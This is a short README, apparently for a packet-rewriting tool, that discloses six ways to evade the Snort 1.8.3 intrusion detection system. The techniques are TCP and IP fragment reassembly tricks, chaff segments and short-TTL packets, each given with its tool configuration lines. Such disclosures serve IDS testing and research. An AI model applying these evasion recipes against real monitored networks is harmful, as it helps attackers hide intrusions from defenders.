README.snort
1
2attacks against snort-1.8.3, reported Jan 28, 2002:
3
41. older TCP retransmission chaff (snort's TCP segment reassembly
5 seems to always favor newer data, even for properly sequenced
6 received data):
7
8 tcp_seg 1
9 tcp_chaff rexmit
10 order random
11
122. forward TCP segmentation overlap, favoring newer data (both Windows
13 and Unix operate this way, in contrast to Ptacek and Newsham's
14 results):
15
16 tcp_seg 1 new
17
183. chaff TCP segments with older TCP timestamp options forcing PAWS
19 elimination:
20
21 tcp_seg 1
22 tcp_chaff paws
23 order random
24
254. older IP fragment duplicates (snort's IP fragment reassembly seems
26 to always favor newer data, even for properly sequenced received
27 data):
28
29 ip_frag 8
30 ip_chaff dup
31 order random
32
335. IP duplicate fragment chaff with bad options:
34
35 ip_frag 8
36 ip_chaff opt
37 order random
38
396. either TCP or IP chaffing with short TTLs (that expire before
40 reaching the end host, but pass by the monitor):
41
42 ip_frag 8
43 ip_ttl 11
44 ip_chaff 10
45 order random
46
47 tcp_seg 1
48 ip_ttl 11
49 tcp_chaff 10
50 order random
51
52there are probably timing attacks against snort's reassembly possible
53as well, but i haven't played with it enough to see.
54
55